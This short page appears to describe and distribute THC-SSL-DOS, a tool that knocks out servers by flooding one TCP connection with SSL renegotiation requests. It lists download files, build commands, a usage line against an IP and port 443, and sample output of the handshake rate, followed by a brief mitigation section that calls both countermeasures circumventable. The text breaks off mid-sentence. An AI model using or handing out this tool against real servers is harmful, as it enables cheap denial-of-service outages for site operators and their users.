This script acts on a security failure present in older(2003) versions of apache. Estabilishing a secure SSL connection requires 15x more processing power on the server than the client. By exploiting this asymmetric property, the client sends thousands of renegotiation requests in the same TCP connection. When server gets overloaded, it stop serving further requests. The attack is very cheap to execute in terms of hardware, as tests made with a single old machine showed.
Download: Windows binary: thc-ssl-dos-1.4-win-bin.zip Unix Source : thc-ssl-dos-1.4.tar.gz Use "./configure; make all install" to build. Usage: ./thc-ssl-dos 127.3.133.7 443 Handshakes 0 [0.00 h/s], 0 Conn, 0 Err Secure Renegotiation support: yes Handshakes 0 [0.00 h/s], 97 Conn, 0 Err Handshakes 68 [67.39 h/s], 97 Conn, 0 Err Handshakes 148 [79.91 h/s], 97 Conn, 0 Err Handshakes 228 [80.32 h/s], 100 Conn, 0 Err Handshakes 308 [80.62 h/s], 100 Conn, 0 Err Handshakes 390 [81.10 h/s], 100 Conn, 0 Err Handshakes 470 [80.24 h/s], 100 Conn, 0 Err
No real solutions exists. The following steps can mitigate (but not solve)
- Disable SSL-Renegotiation
- Install SSL Accelerator
Either of these countermeasures can be circumventing by modifying
THC-SSL-DOS. A better solution is desireable. Somebody should fix